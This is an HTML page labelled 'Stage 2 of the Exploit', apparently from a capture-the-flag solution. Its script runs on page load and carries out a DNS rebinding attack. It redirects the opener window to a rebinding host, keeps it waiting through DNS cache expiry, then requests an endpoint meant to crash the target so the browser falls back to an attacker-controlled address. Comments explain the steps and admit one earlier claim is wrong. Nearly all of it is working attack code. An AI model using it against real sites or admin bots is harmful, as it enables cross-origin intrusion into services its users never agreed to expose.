<html>
    <script>
        const sleep = (ms) => new Promise((r) => setTimeout(r, ms));

        async function exploit(){
            /* 
            * This changes the location of the opener (which is stage-1) to the login page.
            * Actually the URL sends two DNS A-Record, one for the challenge server and the other one for the exploit server.
            * The admin will land on the challenge page, because Chrome will prefer the local address over the remote one.
            * Last minute change, the aformentioned statement is not correct. Apparently is random.
            * We continue fetching non-existent endpoint in order to do some DNS requests.
            * As far as i've understood Chrome has a DNS cache of 60 seconds, that's why we need to keep performing fetch.
            * The request to /moderator/logs will make the server crash. The browser will then perform the request to the other address as fallback.
            * On the other address there will be the third stage.
            */
            opener.location = "http://fishingsolveremote.6b.vc:3000/login"
            for (let i = 0; i < 60; i++) {
                await sleep(100);
            }
            opener.location = "http://fishingsolveremote.6b.vc:3000/moderator/logs"
        }
    </script>
    <head>Stage 2 of the Exploit</head>
    <body onload="exploit()"></body>
</html>